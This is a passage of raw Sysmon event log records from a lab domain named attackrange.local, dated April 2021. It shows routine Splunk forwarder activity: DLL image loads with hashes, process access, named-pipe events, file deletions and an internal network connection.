734700x80000000000000001606379Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606378Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.263{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk 
Inc.splunk-winprintmon.exeMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2trueSplunk, Inc.Valid 10341000x80000000000000001606377Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.247{21761711-83AC-607D-0500-00000000BB01}412976C:\Windows\system32\csrss.exe{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606376Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x80000000000000001606375Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:32.248{21761711-7A88-6080-C660-00000000BB01}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606374Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606373Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606372Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606371Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606370Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 
17141700x80000000000000001606369Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:32.247{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 10341000x80000000000000001095247Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.512{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095246Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.512{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095245Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:32.163{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED96DFB26DAFD8733B4592BA7A053BC9,SHA256=AC9F4BE67FF555145DC8C7A520546D97D778A86A6B2BDB276A9BA022C58C8F87,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606549Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.951{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606548Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.951{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18393D43D282544DD7B93869697584F2,SHA256=55D1B96D6D384FE764CBA6FE9C0A6667DF9B620A60244C039AB5D2E6BFE611ECfalsefalse - insufficient disk space 11241100x80000000000000001606547Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.936{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606546Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.936{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5323624345BC5F68A46D36BAC4B3E4A8,SHA256=33E3728A3B5A2C26C8362F41482523FB8B18E39CF8987A2C2558F8583A7AAD5Ffalsefalse - insufficient disk space 
11241100x80000000000000001606545Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.920{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606544Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.920{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEE02FECFA191AC4324843869B9AFDBB,SHA256=18EBEF24268C7195AD455405E182C9A32D71A5F53BD68E5D1F9D54DF818F1CFEfalsefalse - insufficient disk space 354300x80000000000000001606543Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:31.782{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49733-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 534500x80000000000000001606542Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606541Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x80000000000000001606540Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}51526704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606539Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606538Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.782{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 
23542300x80000000000000001095252Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:33.596{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6960083AEBAB053DA5714C3BF5589A0,SHA256=6EF56593E7B5D67A7091DD907B668A615E9F345CEAC0F2F0D86DF78E350C5AAB,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001606537Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.666{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001606536Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001606535Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001606534Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606533Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001606532Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x80000000000000001606531Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001606530Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 
(rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001606529Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001606528Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001606527Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001606526Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606525Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606524Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001606523Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001606522Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001606521Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001606520Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606519Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 
(rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606518Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001606517Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606516Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606515Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001606514Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001606513Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001606512Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001606511Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
